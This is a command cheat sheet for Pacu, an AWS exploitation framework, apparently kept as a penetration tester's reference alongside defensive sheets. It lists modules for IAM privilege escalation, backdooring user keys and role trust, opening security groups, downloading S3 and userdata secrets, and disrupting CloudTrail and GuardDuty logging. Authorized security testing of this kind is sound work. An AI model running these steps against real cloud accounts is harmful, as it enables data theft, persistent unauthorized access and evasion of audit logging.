PACU
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
Pacu (Rhino Security Labs) is an open-source AWS exploitation framework. It organises offensive AWS testing into modules for enumeration, privilege escalation, persistence, and exfiltration against a set of compromised credentials. Authorized cloud engagements only.
SESSION & CREDENTIALS#
pacu # Launch the console > new_session <name> # Create a session > set_keys # Add AWS access keys > swap_keys # Switch key sets > whoami # Show current identity > import_keys default # Import from AWS CLI profile
MODULE WORKFLOW#
> ls # List all modules > search <keyword> # Find modules > help <module> # Module help > run <module> [args] # Execute a module > data # Show gathered data
ENUMERATION MODULES#
> run iam__enum_users_roles_policies_groups # IAM inventory > run iam__enum_permissions # Effective permissions > run ec2__enum # EC2 instances/volumes > run s3__enum # S3 buckets > run lambda__enum # Lambda functions > run enum__secrets # Secrets Manager / SSM > run iam__bruteforce_permissions # Probe allowed actions
PRIVILEGE ESCALATION#
> run iam__privesc_scan # Find + exploit privesc # Enumerates known IAM escalation paths (CreatePolicyVersion, # PassRole+RunInstances, AttachUserPolicy, UpdateLoginProfile, etc.) # and can auto-exploit with --offline / scan-only options
PERSISTENCE / BACKDOOR#
> run iam__backdoor_users_keys # Add access keys to users > run iam__backdoor_assume_role # Backdoor role trust > run ec2__backdoor_ec2_sec_groups # Open security groups
DATA EXFIL / RECON#
> run s3__download_bucket # Pull bucket contents > run ec2__download_userdata # EC2 userdata (secrets) > run cloudtrail__download_event_history # Grab CloudTrail > run detection__enum_services # Find logging/GuardDuty
EVASION / LOGGING#
> run detection__disruption # Disrupt CloudTrail/GD > run cloudtrail__csv_injection # NOTE: disabling logging is high-impact; only within explicit RoE
EXAMPLES#
# Stand up a session, import CLI keys, map identity + permissions pacu > new_session bank-test > import_keys default > whoami > run iam__enum_permissions # Hunt and (scan-only) report IAM privilege-escalation paths > run iam__privesc_scan # Enumerate exposed S3 and pull an in-scope bucket > run s3__enum > run s3__download_bucket
NOTES#
- Pacu operates on ALREADY-COMPROMISED AWS keys - it is post-access cloud exploitation, not initial access - iam__privesc_scan is the flagship: it maps the same escalation chains your AWS-DETECTION sheet watches for on the blue side - Detection/disruption modules can blind CloudTrail/GuardDuty - these are destructive; require explicit written authorization - Pairs with AWS-DETECTION.txt (defensive view) and complements your existing AWS-IAM-PRIVESC, SCOUTSUITE, PROWLER sheets (audit side) - For LU FS clients, cloud attack paths map to DORA ICT third-party risk and CSSF cloud-outsourcing findings